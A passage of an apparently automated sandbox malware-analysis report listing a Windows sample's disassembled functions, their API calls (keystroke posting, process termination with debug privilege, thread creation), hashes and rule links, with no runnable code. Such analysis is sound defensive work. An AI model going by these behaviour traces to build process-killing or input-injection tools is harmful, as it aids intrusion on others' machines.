                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2819616528-0
                                                                                                                    • Opcode ID: 2688afc534af75e16145b11651470fb6c8ffa4e81c8f545d710fac15ae8cad90
                                                                                                                    • Instruction ID: 7c331762c60c85ca1e9a90444bee9d8fa87c60a1a5f9e27dd4f1c03abe21dacf
                                                                                                                    • Opcode Fuzzy Hash: 2688afc534af75e16145b11651470fb6c8ffa4e81c8f545d710fac15ae8cad90
                                                                                                                    • Instruction Fuzzy Hash: B7519E70A20305EFDB25DF65CC85FAA3BB9EB08350F604528F94697290DBB0ECA1DB50
                                                                                                                    Function 0030966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0030A84C
                                                                                                                      • Part of subcall function 0030A82C: GetCurrentThreadId.KERNEL32 ref: 0030A853
                                                                                                                      • Part of subcall function 0030A82C: AttachThreadInput.USER32(00000000,?,00309683,?,00000001), ref: 0030A85A
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0030968E
                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003096AB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003096AE
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003096B7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003096D5
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003096D8
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003096E1
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003096F8
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003096FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: 4e662928d9eb598ad9781fc02470728ad0970564ad545fb4e83e47773d0de44f
                                                                                                                    • Instruction ID: 13f83679a23450c73851c0ab00272a5f6144b2234812b1051944ab6ccf05edc6
                                                                                                                    • Opcode Fuzzy Hash: 4e662928d9eb598ad9781fc02470728ad0970564ad545fb4e83e47773d0de44f
                                                                                                                    • Instruction Fuzzy Hash: C811A1B1D50618BEF6126F60EC8AF6A7F2DEB4C761F510425F244AB0E1C9F35C50DAA4
                                                                                                                    Function 00308921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0030853C,00000B00,?,?), ref: 0030892A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 00308931
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0030853C,00000B00,?,?), ref: 00308946
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0030853C,00000B00,?,?), ref: 0030894E
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 00308951
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0030853C,00000B00,?,?), ref: 00308961
                                                                                                                    • GetCurrentProcess.KERNEL32(0030853C,00000000,?,0030853C,00000B00,?,?), ref: 00308969
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 0030896C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00308992,00000000,00000000,00000000), ref: 00308986
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 099176727405aa62c8dafa1c968f6083a83dd2e3d8d9df23aa967d29f33e4ca5
                                                                                                                    • Instruction ID: 41572c6605aa62a907f9b012b79049ba6aee3b6f27d6844503c8daaf4f28c6a0
                                                                                                                    • Opcode Fuzzy Hash: 099176727405aa62c8dafa1c968f6083a83dd2e3d8d9df23aa967d29f33e4ca5
                                                                                                                    • Instruction Fuzzy Hash: 2501BF75A40304FFE711ABA5EC8DF673B6CEB89711F404421FA05DB1A1CA709804DB20
                                                                                                                    Function 00329B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: 8610bc04328746388cca51cd4519c436de5674b2205780d3393a842d4eca9c6b
                                                                                                                    • Instruction ID: 1dfaebb4f9e995c57339532bf4b0d3606b6b98233a5013cd914e891c295c09ee
                                                                                                                    • Opcode Fuzzy Hash: 8610bc04328746388cca51cd4519c436de5674b2205780d3393a842d4eca9c6b
                                                                                                                    • Instruction Fuzzy Hash: 3AC1B671A002299FDF15DF58E884BEEB7F9FF48314F16846AE905AB290E7709D44CB90
                                                                                                                    Function 0032975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?,?,00307455), ref: 00307127
                                                                                                                      • Part of subcall function 0030710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307142
                                                                                                                      • Part of subcall function 0030710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307150
                                                                                                                      • Part of subcall function 0030710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?), ref: 00307160
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00329806
                                                                                                                    • _memset.LIBCMT ref: 00329813
                                                                                                                    • _memset.LIBCMT ref: 00329956
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00329982
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0032998D
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 003299DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                    • Opcode ID: be6a25a72e4b6b59a2c73655b253ed31e1fd3c76c277789bfb3e4f661f492d01
                                                                                                                    • Instruction ID: b1facc3cd3f6ec63f05f0aa0dd228311f63c6aafb8b4ca0c13d7827b9096fad7
                                                                                                                    • Opcode Fuzzy Hash: be6a25a72e4b6b59a2c73655b253ed31e1fd3c76c277789bfb3e4f661f492d01
                                                                                                                    • Instruction Fuzzy Hash: 11913871D00229EBDB11DFA5DC81FDEBBB9AF08350F10415AF419AB291DB719A44CFA0
                                                                                                                    Function 00336D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00336E24
                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00336E38
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00336E52
                                                                                                                    • _wcscat.LIBCMT ref: 00336EAD
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00336EC4
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00336EF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                    • Opcode ID: 66a6d2f1af71cd40cde2bcbd7f1cbc2037ec1dd38a0781cf5a17862658567337
                                                                                                                    • Instruction ID: 72b20adb1f0e3c60d4b6e5672a5ef2ea0d528f827effa745f94e33b2b52866f7
                                                                                                                    • Opcode Fuzzy Hash: 66a6d2f1af71cd40cde2bcbd7f1cbc2037ec1dd38a0781cf5a17862658567337
                                                                                                                    • Instruction Fuzzy Hash: A1419371A00348FFDB229F64CC86BEEB7A9EF08350F11452AF544E7191D6719D948B60
                                                                                                                    Function 0032E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00313C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00313C7A
                                                                                                                      • Part of subcall function 00313C55: Process32FirstW.KERNEL32(00000000,?), ref: 00313C88
                                                                                                                      • Part of subcall function 00313C55: CloseHandle.KERNEL32(00000000), ref: 00313D52
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032E9A4
                                                                                                                    • GetLastError.KERNEL32 ref: 0032E9B7
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032E9E6
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0032EA63
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0032EA6E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0032EAA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 8e5e94fa3ff70d58bf203973c97935c66a187c6ebf7df2db68fdd2a6ad385579
                                                                                                                    • Instruction ID: f3f05527eaccd343d1aca401351691c115173940d21925fdb0848110bb92c4b0
                                                                                                                    • Opcode Fuzzy Hash: 8e5e94fa3ff70d58bf203973c97935c66a187c6ebf7df2db68fdd2a6ad385579
                                                                                                                    • Instruction Fuzzy Hash: 5241A9316002119FDB16EF24DCA6FAEBBA9AF45314F188418F9469F2D2CB74AC54CF91
                                                                                                                    Function 00312F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00313033
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 23feb4e292f65ec1716626b8f86b62ef3591a458829ee1595052a825ac7b7bbe
                                                                                                                    • Instruction ID: 9c0ef227354540eca23732fd93f746181adcfbfa0b4b48f2814c67fdd8fd7bb2
                                                                                                                    • Opcode Fuzzy Hash: 23feb4e292f65ec1716626b8f86b62ef3591a458829ee1595052a825ac7b7bbe
                                                                                                                    • Instruction Fuzzy Hash: 51110831648346BED71B9B14DC42CEB6BDC9F2D360F10402AFA02662C1DB616F8456A1
                                                                                                                    Function 003142F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00314312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00314319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0031432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00314336
                                                                                                                    • _wprintf.LIBCMT ref: 0031435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0031437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00314357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 55f55bf703fc7b18bf884cc7ec8cf5fcb760378d4886942a9ab552fa3237836e
                                                                                                                    • Instruction ID: 4275ab0999c65395d94086ccd8711e79fabf67d0eac28a993045834df49803e8
                                                                                                                    • Opcode Fuzzy Hash: 55f55bf703fc7b18bf884cc7ec8cf5fcb760378d4886942a9ab552fa3237836e
                                                                                                                    • Instruction Fuzzy Hash: B10162F6D00208BFE752ABA0DDC9FE6776CDB08301F4005A2B749E2051EB745E954B71
                                                                                                                    Function 0033D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0033D47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0033D49C
                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0033D6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0033D6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0033D716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0033D735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0033D75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0033D77D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: dae52c8cf0bb932bf52df20f609ca043d4e87f82e391cb54ea32d92bca9a29ff
                                                                                                                    • Instruction ID: 5332839eb2b4152978b4be8486a4682bb5234fe8395925bd4bb55dc4a0518462
                                                                                                                    • Opcode Fuzzy Hash: dae52c8cf0bb932bf52df20f609ca043d4e87f82e391cb54ea32d92bca9a29ff
                                                                                                                    • Instruction Fuzzy Hash: 6DB1AA71A00229EFDF1ACF69D9C57AD7BB1BF04701F098069EC589F295D734A990CB90
                                                                                                                    Function 002B2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002B2ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 002B2B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002EC21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002EC286
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: 4dc2d91d29bb6e34f8bc6e2a633cf3ac9da66e4b016456d0b1fdb81cbb3daa14
                                                                                                                    • Instruction ID: 48f12dc9bf8ff41472670413fd3e8a76f2887f16e115dcc5c9805f424059a564
                                                                                                                    • Opcode Fuzzy Hash: 4dc2d91d29bb6e34f8bc6e2a633cf3ac9da66e4b016456d0b1fdb81cbb3daa14
                                                                                                                    • Instruction Fuzzy Hash: 91417D316347C1DFC73AAF698CC8BEB7B95AB45380F74881DE18782560C6B0A86AC711
                                                                                                                    Function 003170C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003170DD
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00317114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00317130
                                                                                                                    • _memmove.LIBCMT ref: 0031717E
                                                                                                                    • _memmove.LIBCMT ref: 0031719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 003171AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003171BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003171DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    • Opcode ID: af619a3c270828beb1363ad900e9eeff63d57cb8013127d3e695bd6fd8e38a0c
                                                                                                                    • Instruction ID: 45861f401bf1623b70a5cddbe667d1d3030a5df28faeaf986b9cce6f5aea4edb
                                                                                                                    • Opcode Fuzzy Hash: af619a3c270828beb1363ad900e9eeff63d57cb8013127d3e695bd6fd8e38a0c
                                                                                                                    • Instruction Fuzzy Hash: 93316C35900205EBCB01DFA5DC85AAFB778EF49710F5481B6E904AA256DB709E54CBA0
                                                                                                                    Function 003361D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003361EB
                                                                                                                    • GetDC.USER32(00000000), ref: 003361F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003361FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0033620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00336246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00336257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0033902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00336291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003362B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
